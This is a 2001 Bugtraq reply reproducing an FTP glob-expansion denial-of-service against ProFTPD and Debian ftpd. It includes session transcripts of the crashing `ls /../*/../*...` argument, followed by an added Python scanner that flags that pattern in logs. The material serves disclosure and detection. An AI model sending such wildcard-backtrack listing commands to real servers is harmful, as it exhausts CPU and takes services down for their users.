[22343] in bugtraq
RE: Multiple-Vendor-FTP-Vuln. (old?)
daemon@ATHENA.MIT.EDU (E. van Elk)
Mon Aug 20 19:53:39 2001
Message-Id: <5.1.0.14.2.20010821012930.02edfd50@pop.eve-software.com>
Date: Tue, 21 Aug 2001 01:41:14 +0200
To: bugtraq@securityfocus.com
From: "E. van Elk" <evelk@dsv.nl>
In-Reply-To: <C01D5C25A363D411A99200902760F2712C2A94@thematrix.datafx.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
At 00:43 21-8-2001, you wrote:
>Couldn't reproduce on Debian 2.2....
>
>isp-server-03:/# proftpd -v
> - ProFTPD Version 1.2.0pre10
I tested it on my Debian 2.2 machine and:
:/# proftpd -v
- ProFTPD Version 1.2.0pre10
Verbonden met .
220 ProFTPD 1.2.0pre10 Server (Debian) []
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>
CPU goes to 99.1 % and after the second attempt the connection to the
server is broken.
Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:
Verbonden met .
220 FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686 unknown
230-
230 User logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>
CPU goes to 99.1 % and after the second attempt the connection to the
server is broken.
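As an added defender-side example (not part of this post or of any FTP daemon named in the thread): a small Python scan over a constructed FTP command log that flags LIST/NLST arguments combining many wildcard components with `..` backtracking, the shape of the listing shown above. The log format, field order and the `max_wild` threshold are assumptions.

```python
import re

# Constructed listing argument of the same shape as in the thread:
# 12 wildcard components, each followed by a '..' climb.
BAD_ARG = "/" + "/".join(["..", "*"] * 12)

# Constructed sample of FTP server command log lines (assumed format:
# date time client-ip COMMAND argument).
SAMPLE_LOG = f"""\
2001-08-21 01:30:12 203.0.113.7 USER alice
2001-08-21 01:30:13 203.0.113.7 PASS ****
2001-08-21 01:30:20 203.0.113.7 LIST /pub/incoming
2001-08-21 01:30:25 203.0.113.7 NLST *.txt
2001-08-21 01:30:31 203.0.113.7 LIST {BAD_ARG}
2001-08-21 01:30:34 203.0.113.7 LIST {BAD_ARG}
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (LIST|NLST|STAT) (.*)$")


def glob_cost(arg):
    """Crude amplification estimate for a glob argument.
    Returns (wildcard components, '..' components that follow a wildcard).
    Each '*' can match every entry of a directory, and a '..' after it
    sends the walk back up, so the next '*' is expanded once per earlier
    match: the combination is what makes the expansion blow up."""
    parts = [p for p in arg.split("/") if p]
    wild = backtrack = 0
    for p in parts:
        if any(c in p for c in "*?["):
            wild += 1
        elif p == ".." and wild:
            backtrack += 1
    return wild, backtrack


def is_pathological(arg, max_wild=3):
    """Flag only the wildcard-plus-backtrack shape; plain globs such as
    '*.txt' or '/a/*/b/*' stay allowed."""
    wild, back = glob_cost(arg)
    return wild > max_wild and back > 0


def scan_log(text, max_wild=3):
    """Return (timestamp, client, command, argument) for every listing
    command whose argument looks like an expansion bomb."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and is_pathological(m.group(4), max_wild):
            hits.append(m.groups())
    return hits
```

The same check can sit in front of the daemon (in a proxy or a wrapper that rejects such arguments before they reach the glob routine), which is cheaper than detecting the CPU spike after the fact.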